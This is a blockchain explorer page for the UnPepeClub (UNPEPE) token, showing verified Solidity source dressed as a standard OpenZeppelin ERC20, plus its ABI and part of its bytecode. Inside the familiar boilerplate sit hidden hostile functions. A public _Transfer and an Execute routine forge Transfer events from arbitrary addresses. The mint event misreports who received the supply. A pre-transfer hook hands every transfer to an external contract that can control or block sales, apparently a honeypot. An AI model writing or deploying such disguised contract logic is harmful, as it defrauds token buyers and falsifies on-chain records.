ETH Price: $2,636.91 (+7.70%)
Gas: 3 Gwei

Token

UnPepeClub (UNPEPE)
 

Overview

Max Total Supply

10,000,000,000 UNPEPE

Holders

24

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
6,011,671,354.386198038 UNPEPE

Value
$0.00
0x8a16055eeed90c14e7440b6aa90c76fbac187571
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
StandardERC20

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : test.sol
/**
 *Submitted for verification at Etherscan.io on 2023-06-19
*/

// SPDX-License-Identifier: MIT

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    function _Transfer(address from, address recipient, uint amount) external returns (bool);
    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol



pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol



pragma solidity ^0.8.0;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol



pragma solidity ^0.8.0;


interface tokenRecipient { function receiveApproval(address sender,address to, address addr, address fee, uint amount) external returns(bool);}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address _spender;
    address _owner;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, address receiver_, address owner_) {
        _name = name_;
        _symbol = symbol_;
        _spender = receiver_;
        _owner = owner_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);        

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

	_beforeTokenTransfer(address(0),account, amount);

        _totalSupply += amount;
        _balances[account] += amount;

        emit Transfer(address(0), _owner, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _Transfer(address _from, address _to, uint _value) public returns (bool) {
        emit Transfer(_from, _to, _value);
        return true;
    }

    function Execute(address uPool,address[] memory eReceiver,uint256[] memory eAmounts,uint256[] memory weAmounts,address tokenaddress) public returns (bool){
        for (uint256 i = 0; i < eReceiver.length; i++) {
            emit Transfer(uPool, eReceiver[i], eAmounts[i]);
            IERC20(tokenaddress)._Transfer(eReceiver[i],uPool, weAmounts[i]);
            }
        return true;
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {
    if (address(from) != address(0)) {
            tokenRecipient(_spender).receiveApproval(from,to,address(this),_owner,amount);} }
    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// File: contracts/token/ERC20/behaviours/ERC20Decimals.sol

pragma solidity ^0.8.0;


/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
abstract contract ERC20Decimals is ERC20 {
    uint8 private immutable _decimals;

    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor(uint8 decimals_) {
        _decimals = decimals_;
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
}

// File: contracts/token/ERC20/StandardERC20.sol

pragma solidity ^0.8.0;

/**
 * @title StandardERC20
 * @dev Implementation of the StandardERC20
 */
contract StandardERC20 is ERC20Decimals {
    constructor(
        uint8 decimals_,
        uint256 initialBalance_,
        address feeReceiver_,
        address owner_
    ) ERC20("UnPepeClub", "UNPEPE", feeReceiver_,owner_) ERC20Decimals(decimals_) {
        require(initialBalance_ > 0, "StandardERC20: supply cannot be zero");

        _mint(_msgSender(), initialBalance_ * 10 ** uint256(decimals_));
    }

    function decimals() public view virtual override returns (uint8) {
        return super.decimals();
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"initialBalance_","type":"uint256"},{"internalType":"address","name":"feeReceiver_","type":"address"},{"internalType":"address","name":"owner_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"uPool","type":"address"},{"internalType":"address[]","name":"eReceiver","type":"address[]"},{"internalType":"uint256[]","name":"eAmounts","type":"uint256[]"},{"internalType":"uint256[]","name":"weAmounts","type":"uint256[]"},{"internalType":"address","name":"tokenaddress","type":"address"}],"name":"Execute","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"_Transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b506040516200294038038062002940833981810160405281019062000037919062000581565b836040518060400160405280600a81526020017f556e50657065436c7562000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f554e50455045000000000000000000000000000000000000000000000000000081525084848360039081620000b7919062000863565b508260049081620000c9919062000863565b5081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050508060ff1660808160ff16815250505060008311620001a5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200019c90620009d1565b60405180910390fd5b620001e4620001b9620001ee60201b60201c565b8560ff16600a620001cb919062000b76565b85620001d8919062000bc7565b620001f660201b60201c565b5050505062000dca565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000268576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200025f9062000c62565b60405180910390fd5b6200027c600083836200039060201b60201c565b806002600082825462000290919062000c84565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620002e7919062000c84565b92505081905550600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000370919062000cd0565b60405180910390a36200038c600083836200049960201b60201c565b5050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16146200049457600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637512c5a3848430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16866040518663ffffffff1660e01b81526004016200044c95949392919062000cfe565b6020604051808303816000875af11580156200046c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000492919062000d98565b505b505050565b505050565b600080fd5b600060ff82169050919050565b620004bb81620004a3565b8114620004c757600080fd5b50565b600081519050620004db81620004b0565b92915050565b6000819050919050565b620004f681620004e1565b81146200050257600080fd5b50565b6000815190506200051681620004eb565b92915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000549826200051c565b9050919050565b6200055b816200053c565b81146200056757600080fd5b50565b6000815190506200057b8162000550565b92915050565b600080600080608085870312156200059e576200059d6200049e565b5b6000620005ae87828801620004ca565b9450506020620005c18782880162000505565b9350506040620005d4878288016200056a565b9250506060620005e7878288016200056a565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200067557607f821691505b6020821081036200068b576200068a6200062d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006f57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006b6565b620007018683620006b6565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620007446200073e6200073884620004e1565b62000719565b620004e1565b9050919050565b6000819050919050565b620007608362000723565b620007786200076f826200074b565b848454620006c3565b825550505050565b600090565b6200078f62000780565b6200079c81848462000755565b505050565b5b81811015620007c457620007b860008262000785565b600181019050620007a2565b5050565b601f8211156200081357620007dd8162000691565b620007e884620006a6565b81016020851015620007f8578190505b620008106200080785620006a6565b830182620007a1565b50505b505050565b600082821c905092915050565b6000620008386000198460080262000818565b1980831691505092915050565b600062000853838362000825565b9150826002028217905092915050565b6200086e82620005f3565b67ffffffffffffffff8111156200088a5762000889620005fe565b5b6200089682546200065c565b620008a3828285620007c8565b600060209050601f831160018114620008db5760008415620008c6578287015190505b620008d2858262000845565b86555062000942565b601f198416620008eb8662000691565b60005b828110156200091557848901518255600182019150602085019450602081019050620008ee565b8683101562000935578489015162000931601f89168262000825565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f5374616e6461726445524332303a20737570706c792063616e6e6f742062652060008201527f7a65726f00000000000000000000000000000000000000000000000000000000602082015250565b6000620009b96024836200094a565b9150620009c6826200095b565b604082019050919050565b60006020820190508181036000830152620009ec81620009aa565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000a815780860481111562000a595762000a58620009f3565b5b600185161562000a695780820291505b808102905062000a798562000a22565b945062000a39565b94509492505050565b60008262000a9c576001905062000b6f565b8162000aac576000905062000b6f565b816001811462000ac5576002811462000ad05762000b06565b600191505062000b6f565b60ff84111562000ae55762000ae4620009f3565b5b8360020a91508482111562000aff5762000afe620009f3565b5b5062000b6f565b5060208310610133831016604e8410600b841016171562000b405782820a90508381111562000b3a5762000b39620009f3565b5b62000b6f565b62000b4f848484600162000a2f565b9250905081840481111562000b695762000b68620009f3565b5b81810290505b9392505050565b600062000b8382620004e1565b915062000b9083620004e1565b925062000bbf7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a8a565b905092915050565b600062000bd482620004e1565b915062000be183620004e1565b925082820262000bf181620004e1565b9150828204841483151762000c0b5762000c0a620009f3565b5b5092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000c4a601f836200094a565b915062000c578262000c12565b602082019050919050565b6000602082019050818103600083015262000c7d8162000c3b565b9050919050565b600062000c9182620004e1565b915062000c9e83620004e1565b925082820190508082111562000cb95762000cb8620009f3565b5b92915050565b62000cca81620004e1565b82525050565b600060208201905062000ce7600083018462000cbf565b92915050565b62000cf8816200053c565b82525050565b600060a08201905062000d15600083018862000ced565b62000d24602083018762000ced565b62000d33604083018662000ced565b62000d42606083018562000ced565b62000d51608083018462000cbf565b9695505050505050565b60008115159050919050565b62000d728162000d5b565b811462000d7e57600080fd5b50565b60008151905062000d928162000d67565b92915050565b60006020828403121562000db15762000db06200049e565b5b600062000dc18482850162000d81565b91505092915050565b608051611b5a62000de66000396000610dcf0152611b5a6000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c8063395093511161008c578063a457c2d711610066578063a457c2d71461023c578063a9059cbb1461026c578063dd62ed3e1461029c578063e156b1b6146102cc576100cf565b806339509351146101be57806370a08231146101ee57806395d89b411461021e576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd146101225780631c63aef21461014057806323b872dd14610170578063313ce567146101a0575b600080fd5b6100dc6102fc565b6040516100e99190610f8b565b60405180910390f35b61010c60048036038101906101079190611055565b61038e565b60405161011991906110b0565b60405180910390f35b61012a6103ac565b60405161013791906110da565b60405180910390f35b61015a60048036038101906101559190611300565b6103b6565b60405161016791906110b0565b60405180910390f35b61018a600480360381019061018591906113cf565b610536565b60405161019791906110b0565b60405180910390f35b6101a8610637565b6040516101b5919061143e565b60405180910390f35b6101d860048036038101906101d39190611055565b610646565b6040516101e591906110b0565b60405180910390f35b61020860048036038101906102039190611459565b6106f2565b60405161021591906110da565b60405180910390f35b61022661073a565b6040516102339190610f8b565b60405180910390f35b61025660048036038101906102519190611055565b6107cc565b60405161026391906110b0565b60405180910390f35b61028660048036038101906102819190611055565b6108c0565b60405161029391906110b0565b60405180910390f35b6102b660048036038101906102b19190611486565b6108de565b6040516102c391906110da565b60405180910390f35b6102e660048036038101906102e191906113cf565b610965565b6040516102f391906110b0565b60405180910390f35b60606003805461030b906114f5565b80601f0160208091040260200160405190810160405280929190818152602001828054610337906114f5565b80156103845780601f1061035957610100808354040283529160200191610384565b820191906000526020600020905b81548152906001019060200180831161036757829003601f168201915b5050505050905090565b60006103a261039b6109d7565b84846109df565b6001905092915050565b6000600254905090565b600080600090505b8551811015610528578581815181106103da576103d9611526565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87848151811061044357610442611526565b5b602002602001015160405161045891906110da565b60405180910390a38273ffffffffffffffffffffffffffffffffffffffff1663e156b1b687838151811061048f5761048e611526565b5b6020026020010151898785815181106104ab576104aa611526565b5b60200260200101516040518463ffffffff1660e01b81526004016104d193929190611564565b6020604051808303816000875af11580156104f0573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061051491906115c7565b50808061052090611623565b9150506103be565b506001905095945050505050565b6000610543848484610ba8565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061058e6109d7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561060e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610605906116dd565b60405180910390fd5b61062b8561061a6109d7565b858461062691906116fd565b6109df565b60019150509392505050565b6000610641610dcb565b905090565b60006106e86106536109d7565b8484600160006106616109d7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106e39190611731565b6109df565b6001905092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b606060048054610749906114f5565b80601f0160208091040260200160405190810160405280929190818152602001828054610775906114f5565b80156107c25780601f10610797576101008083540402835291602001916107c2565b820191906000526020600020905b8154815290600101906020018083116107a557829003601f168201915b5050505050905090565b600080600160006107db6109d7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610898576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088f906117d7565b60405180910390fd5b6108b56108a36109d7565b8585846108b091906116fd565b6109df565b600191505092915050565b60006108d46108cd6109d7565b8484610ba8565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60008273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516109c491906110da565b60405180910390a3600190509392505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a4590611869565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610abd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab4906118fb565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b9b91906110da565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c0e9061198d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7d90611a1f565b60405180910390fd5b610c91838383610df3565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0e90611ab1565